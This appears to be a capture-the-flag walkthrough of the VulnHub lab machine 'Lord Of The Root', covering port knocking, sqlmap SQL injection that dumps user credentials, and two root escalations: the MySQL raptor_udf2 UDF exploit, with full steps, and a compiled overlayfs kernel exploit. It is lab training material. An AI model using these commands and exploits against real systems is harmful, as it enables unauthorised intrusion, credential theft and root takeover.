VulnHub — Lord Of The Root: 1.0.1

Lord Of The Root: 1.0.1

Nmap

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 1024 3c:3d:e3:8e:35:f9:da:74:20:ef:aa:49:4a:1d:ed:dd (DSA)
| 2048 85:94:6c:87:c9:a8:35:0f:2c:db:bb:c1:3f:2a:50:c1 (RSA)
| 256 f3:cd:aa:1d:05:f2:1e:8c:61:87:25:b6:f4:34:45:37 (ECDSA)
|_ 256 34:ec:16:dd:a7:cf:2a:86:45:ec:65:ea:05:43:89:21 (ED25519)
MAC Address: 08:00:27:D9:1F:A2 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10–4.11, Linux 3.16–4.6, Linux 3.2–4.9, Linux 4.4
Uptime guess: 197.261 days (since Mon Apr 1 09:49:49 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.38 ms 10.0.0.28

And here we just getting ssh port to be open so let’s visit it

Here we get to see that we have knock the port , as we are getting hint in the banner “KNOCK” and the sequence may be 1,2,3 so let’s start with it

Here we knock the port using the 1 2 3 sequence we get at SSH and now we got http port to be open at 1337

On visiting 1337 we get image , and when we visit the url

http://10.0.0.28:1337/index.php we get a new image and when we check the source code we get a base64 hash in a comment

And when we decrypt base64 string we got

Lzk3ODM0NTIxMC9pbmRleC5waHA= Closer!

And when we again decrpyt the lz…………Ha hash we get the url

As we decrypt the password again we get /978345210/index.php

And here we get a login page , at http://10.0.0.28:1337/978345210/index.php

Let’s try to crack with login with sqlmap

sqlmap --url http://10.0.0.28:1337/978345210/index.php --forms --dbs --level=5 --risk=3 --batch

Here we can we get the database and find users cerds at Webapps database

sqlmap --url http://10.0.0.28:1337/978345210/index.php --forms --dbs --level=5 --risk=3 -D Webapp -T Users --columns --dump

Here we get the creds for the Users

Database: Webapp
Table: Users
[5 entries]
+ — — + — — — — — + — — — — — — — — — +
| id | username | password |
+ — — + — — — — — + — — — — — — — — — +
| 1 | frodo | iwilltakethering        |     
| 2 | smeagol | MyPreciousR00t        |
| 3 | aragorn | AndMySword            |
| 4 | legolas | AndMyBow              |
| 5 | gimli | AndMyAxe                |
+ — — + — — — — — + — — — — — — — — — +

And using smeagol username and password we get the ssh connection

Now when we move to /var/www/978345210/ and see the login.php we found mysql creds for root

$db = new mysqli(‘localhost’, ‘root’, ‘darkshadow’, ‘Webapp’);

And found mysql exploit at exploit db “http://www.exploit-db.com/exploits/1518” here we found a mysql exploit and now we are going to exploit the local privilege using the 1518.c exploit

We moved our 1518.c exploit to our target machine using the python server , now rename the exploit from 1518.c to raptor_udf2.c and follow the steps

copy raptor_udf2.c to smeagol home directory and follow below steps
* gcc -g -c raptor_udf2.c
* gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
* mysql -u root -p #login with the password darkshadow
* mysql> use mysql;
* mysql> create table foo(line blob);
* mysql> insert into foo values(load_file(‘/home/smeagol/raptor_udf2.so’));
* mysql> select * from foo into dumpfile ‘/usr/lib/raptor_udf2.so’;
* mysql> create function do_system returns integer soname ‘raptor_udf2.so’;
* select * from mysql.func;
* select do_system(‘id > /tmp/out; chown raptor.raptor /tmp/out’);
* \! sh
* id 
uid=0(root) gid=0(root) groups=0(root)

And we got the root shell

ANOTHER WAY TO PRIVILEGE ESCALATION

When we check the krenel we got it vulnerable and found the exploit at exploit db “https://www.exploit-db.com/exploits/39166”

And now we move this exploit to our target machine and compile it using

smeagol@LordOfTheRoot:~$ gcc 39166.c -o overlayfail 
smeagol@LordOfTheRoot:~$ ./overlayfail 
root@LordOfTheRoot:~# id
uid=0(root) gid=1000(smeagol) groups=0(root),1000(smeagol)
root@LordOfTheRoot:~# cd /root/
root@LordOfTheRoot:/root# cat Flag.txt 
“There is only one Lord of the Ring, only one who can bend it to his will. And he does not share power.”
– Gandalf
root@LordOfTheRoot:/root#

Hence we exploited with 2 ways

…………………………………..COWABUNGA…………………………………..